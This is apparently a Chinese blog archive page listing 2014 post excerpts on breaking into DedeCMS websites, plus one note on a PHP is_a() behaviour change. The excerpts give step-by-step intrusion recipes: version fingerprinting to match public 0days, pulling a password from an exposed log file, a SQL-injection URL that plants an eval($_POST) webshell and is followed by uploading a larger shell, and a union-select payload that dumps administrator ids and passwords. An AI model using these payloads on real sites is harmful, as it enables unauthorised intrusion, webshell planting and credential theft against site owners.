2014年3月30日
摘要: 1.查看dedecms最后升级版本:http://xxx.com/data/admin/ver.txt2.利用网上公开之0day进行对应版本之入侵ps:dedecms默认CMS后台:http://xxx.com/dede/ 阅读全文
posted @ 2014-03-30 22:24 milantgh 阅读(1108) 评论(0) 推荐(0) 编辑
摘要: 1.判断网站是否有log路径2.找到日志文件路径:jwc.xxx.com/log/2014-03-18-log.txt3.找到账户为jwc01的密码password4.登录教务系统 阅读全文
posted @ 2014-03-30 22:16 milantgh 阅读(387) 评论(0) 推荐(1) 编辑
摘要: 1、注入漏洞存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>注入成功,产生了注入文件。http://localhost:802/data/mysql_error_trace.php一句话木马连接上传大马即 阅读全文
posted @ 2014-03-30 20:38 milantgh 阅读(8717) 评论(0) 推荐(0) 编辑
摘要: 一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入三、爆用户:/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id四、爆密码的字段:/memb 阅读全文
posted @ 2014-03-30 20:25 milantgh 阅读(1889) 评论(0) 推荐(0) 编辑
摘要: 详细说明:member/buy_action.phprequire_once(dirname(__FILE__)."/config.php");CheckRank(0,0);$menutype = 'mydede';$menutype_son = 'op';require_once DEDEINC.'/dedetemplate.class.php';$product = isset($product) ? trim($product) : '';$mid = $cfg_ml->M_ID;$ptype = 阅读全文
posted @ 2014-03-30 20:15 milantgh 阅读(1285) 评论(0) 推荐(0) 编辑
摘要: 今天看到云舒在群里贴的漏洞公告,原始的文章在http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/后来查了下PHP官方的手册,这个问题是在PHP 5.3.7中更新了is_a()函数的功能。is_a()经常被用于条件判断。 在此前版本的is_a() 的第一个参数如果不是object,则会返回false,现在变成了如果不是object ,则会去执行 __autoload()函数。PHP为此还开了一个bug,但对此bug仍然有争议,部分开发人员认为这个功能是正常的。Aron Budins 阅读全文
posted @ 2014-03-30 09:43 milantgh 阅读(2120) 评论(0) 推荐(0) 编辑